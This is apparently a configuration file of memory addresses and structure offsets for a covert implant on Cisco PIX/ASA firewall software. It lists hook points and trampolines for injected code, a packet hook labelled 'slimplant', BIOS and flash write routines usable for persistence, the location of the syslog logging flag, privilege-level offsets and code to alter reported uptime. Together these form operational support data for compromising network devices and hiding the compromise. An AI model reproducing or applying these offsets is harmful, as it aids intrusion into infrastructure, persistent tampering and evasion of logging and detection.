; --- SECTION I ---
;
0x40080306            // pix version
0x1bf0000             // address of implant configuration
0x0   0x08950970      // allocb
0x1   0x089502d0      // freeb
0x2   0x080617f0      // open (7.0(+) this is an array for Channel Stuff)
0x3   0x0846cf60      // ip_put
0x4   0x08061950      // close
0x5   0x090ce090      // atoip
0x6   0x090fdb0c      // memset
0x7   0x090e4f90      // memmove
0x8   0x08950140      // malloc_call_calloc
0x9   0x090e4a10      // free
0xa   0x08061100      // kprintf
0xb   0x00000014      // interface offset in metaframe
0xc   0x00000010      // offset for vlan number in interface struct
0xd   0x0000005c      // metaframe offset in block structure
0xe   0x00000078      // interface semiphore in metaframe
0xf   0x090e60e0      // rand
0x15  0x0805fc50      // process_create
0x16  0x0805f5f0      // process_suspend
0x17  0x0805ee20      // process_sleep_for
0x18  0x087985f0      // show_process
0x19  0x0000001c      // offset to security level in int_struct
0x1a  0x09a2e460      // cur_t
0x1b  0x04            // channel offset in interface struct
0x1c  0x0c            // PUT offset in channel struct
0x1d  0x24            // offset to dest mac in arp structure
0x1e  0x10            // offset to next hop ip in route structure
0x1f  0x20            // size of route struct
0x20  0x0846fff0      // calc_ip_cksum
0x21  0x08470f80      // arp_loopkup
0x22  0x0846f470      // set_block_hdr_mac_and_proto
0x23  0x08480a60      // get hardware interface
0x24  0x08714710      // get next hop
0x25  0x087149b0      // get route
0x26  0x0846b1c0      // send_it
0x27  0x08472d30      // arp_create
0x28  0x087f2dc0      // get_hw_iface_2
0x2a  0x3c            // pointer to ethernet frame
0x2b  0x34            // wptr structure offset
0x2c  0x1c            // inIfc (incoming interface) structure offset
0x2e  0x000001ac      // offset from cur_t that contains the current context number
0x2f  0x09953460      // pointer to channnel list
0x30  0x0964f474      // address of NIC database
0x31  0x00000014      // offset to vlan struct in metaframe (interface offset)
0x32  0x00000020      // offset to IP address in int_struct
0x33  0x00000018      // iface struct adjust from metaframe
0x34  0x09960354      // max number of interface cards
0x35  0x09a2ec80      // internal_clock
0x36  0x087f0880      // get_interface_mac
0x37  0x0000014b      // offset to hardware interface number in interface struct
0x38  0x10            // offset to ip in route structure
0x39  0x00            // offset to interface num in route structure
0x3a  0x00000420      // offset to send channel in channel list
0x3b  0x083c91a0      // ifs_read; flash file read routine -- IFS: Read:
0x3c  0x083c9280      // ifs_write; flash file write routine -- IFS: Write:
0x3d  0x083c87e0      // ifs_open; flash file open routine -- IFS: Opened: 
0x3e  0x083c90c0      // ifs_close; flash file close routine -- IFS: Close: 
0x3f  0x00000018      // offset to next IP fragment pointer in block
0x40  0x09a47820      // address of context list
0x42  0x090fc340      // checkheaps checksum location
0x43  0x0845eb30      // get booted image's filename
0x44  0x0833025f      // fix image size hook point
0x45  0x01cb31da      // clean image file size
0x46  0xffffffff      // asa fix image size hook point
0x47  0x2c            // offset to filesize in file info struct
0x52  0x0849f0b0      // ipv6_encap
;
; --- END OF SECTION I ---
;
:EOS:
;
; --- SECTION II ---
;
HookLocation              0x0860acb7      // address of our hook point
HookedCall                0x0860e400      // called function being hooked
JmpLocation               0x08fe90f2      // empty area to jump to
InterfaceAddr             0x0964f474      // same as 0x30 above
InterfaceLeng             0x000001c0      // length of interface struct
IntSecurityOffset         0x1c            // security level field offset
IntNameOffset             0x00000190      // interface name field offset
IntNumOffset              0x0000014b      // interface number field offset
IntVlanOffset             0x10            // same as 0xc above
IntIPOffset               0x20            // ip address offset in the interface struct
IntNetmaskOffset          0x24            // netmask in the iface struct
FlashClassAddr            0x00000000      // addr of flash structure (not used in 7.*)
CryptoDeviceAddr          0x09a32b84      // addr of crypto structure
ArpTableAddrPtr           0x0963f568      // addr of first entry in ARP table
NumInterfaces             0x00000000      // addr of pointer to number of interfaces (not used in 7.*)
IfaceStruct2              0x00000000      // addr of pointer to second smaller interface struct (not used in 7.*)
IfaceStruct2Len           0x00            // length of 2nd smaller interface struct used by arp cache (not used in 7.*)
BiosClassAddr             0x09a3ece0      // addr of the bios class structure
BiosWriteAddr1            0x08329330      // addr of the bios write function for one specific bios
BiosWriteAddr2            0x0832bb20      // addr of the bios write function for one specific bios
BiosWriteAddr3            0x0832b5b0      // addr of the bios write function for one specific bios
BiosWriteAddr4            0x0832c400      // addr of the bios write function for one specific bios
BiosWriteOffset           0x00000020      // offset into the bios structure where write addr is located
FlashMkdirAddress         0x083c9d90      // ifs_mkdir; make flash directory routine -- IFS: Mkdir
ASAFlashRmdirAddress      0x08330f70      // ifs_rmdir; remove flash directory routine for the asa
PIXFlashRmdirAddress      0x08318c90      // ifs_rmdir; remove flash directory routine for the pix
ASAFlashRmfileAddress     0x08330a90      // ifs_rmfile; remove flash file routine for the asa
PIXFlashRmfileAddress     0x08318970      // ifs_rmfile; remove flash file routine for the pix
FlashDirlistAddress       0x083c9480      // ifs_get_dir_entry; get the next file name from a directory listing
FlashGetSizeAddress       0x083ca070      // ifs_get_size; get the size of the provided open file
FlashChmodAddress         0x083c9920      // ifs_chmod; change the permissions on a file
FlashMoveFileAddress      0x083c9a80      // ifs_rename; move a file
FlashGetFileInfoAddress   0x00000000      // ifs_get_file_info; returns a structure that contains information about a file, including its size
FlashGetSpaceAddress      0x083caef0      // ifs_get_space_info; returns used and free space in flash
FlashFileInfoSizeOffset   0x0000002c      // The offset to the file size in the structure returned by ifs_get_file_info
GetPlatformStringAddr     0x090f4700      // The address of a function that returns the platform string 
ASARestatFlashFlagAddr    0xffffffff      // The address of the flag that tells the OS on the ASA to re-stat the files in flash (causes used space to be updated)
AnnounceFunc              0x080615e0      // addr of the device announce function
DevIoctlOffset            0x70            // offset to ioctl function in device table
DuartTtyAddr              0x095ae160      // addr of duart/0 tty entry
CIStartFunc               0x080ad870      // addr of the command interface start function -- telnet function
CommandListAddr           0x096768c0      // addr of the command list -- first parameter of ci
DeviceListPtrAddr         0x09920e28      // pointer to the first entry in the device table -- find in announce
DeviceNextPtrOffset       0x50            // offset into the device table entry which has pointer to next entry -- find in announce
StrcmpFuncAddr            0x090ea040      // address of strcmp -- search for 'strcmp'
SyslogFlagPtrAddr         0x09ba0e80      // pointer to the logging flag. -- search for 'Syslog logging:'
PGDGETValue               0x85b00002      // The value used for PGD_GET when calling the pager ioctl
PGDPUSHValue              0x85b00003      // The value used for PGD_PUSH when calling the pager ioctl
PGDSETValue               0x85b00000      // The value used for PGD_SET when calling the pager ioctl
StdChOffset               0x84            // Offset into a thread struct containing the stdch pointer
StdErrOffset              0x88            // Offset into a thread struct containing the stderr pointer
PrivFlagOffset            0x0c            // offset into an environment struct containing the privilege level indicator
UnameOffset               0x14            // offset into an environment struct containing the username 
EnvPtrOffset              0x90            // offset into a thread struct containing the pointer to the environment struct  
SyslogOffset              0x00000b18      // offset into the syslog structure where the logging level is stored
Open                      0x080617f0      // open
ChannelConfigOffset       0x08            // offset into a channel where the configuration pointer is
InputModeOffset           0x14            // offset into a duart config structure where the input mode is stored
InputModeEsc              0x20            // Input mode used for entering escape sequence
WatchDogTimeout           0x0957b620      // Address where the thread timeout value is stored 
UpTimeCounter             0x09a2ec80      // Address of the up time counter
Display_uptime_addr       0x080b5740      // Address of the function that display the uptime
Inserted_code_addr        0x08fe90f2      // Address of the our insterted function to add time to the uptime
i2cReadByte               0x08d135c0      // read byte function needed to operate on the bios of the asa 5505
i2cWriteByte              0x08d13440      // write byte function needed to operate on the bios of the asa 5505
CLIHookAddress            0x080add2a      // Address of hook into the command interface
AvailMemoryPtr            0x09b35c20      // Address of total available memory
;
BN_new              0x090316c0  //BIGNUM library functions
BN_free             0x09031630
BN_mod_exp          0x09069620
BN_CTX_new          0x0904e670
BN_CTX_free         0x0904e920
BN_bin2bn           0x09032480
BN_bn2bin           0x09031f50
BN_rand             0x09069950
BN_print            0x090510f0
BN_num_bits         0x09031df0
DH_p                0x09592ac0 //DiffieHelman large prime
aesEncrypt          0x080c7c30 //AES encrypt/decrypt function
aesKeySet           0x080c9ce1 //AES key schedule function.  Search for (aesKeySched)
slimHookAddr        0x0839a716 //Packet hook for slimplant Hook bytes: 01 c1 89 4b 34
slimTrampoline      0x08fe90f2 //trampoline for slimplant
;
; --- END OF SECTION II ---
;
:EOS:
;
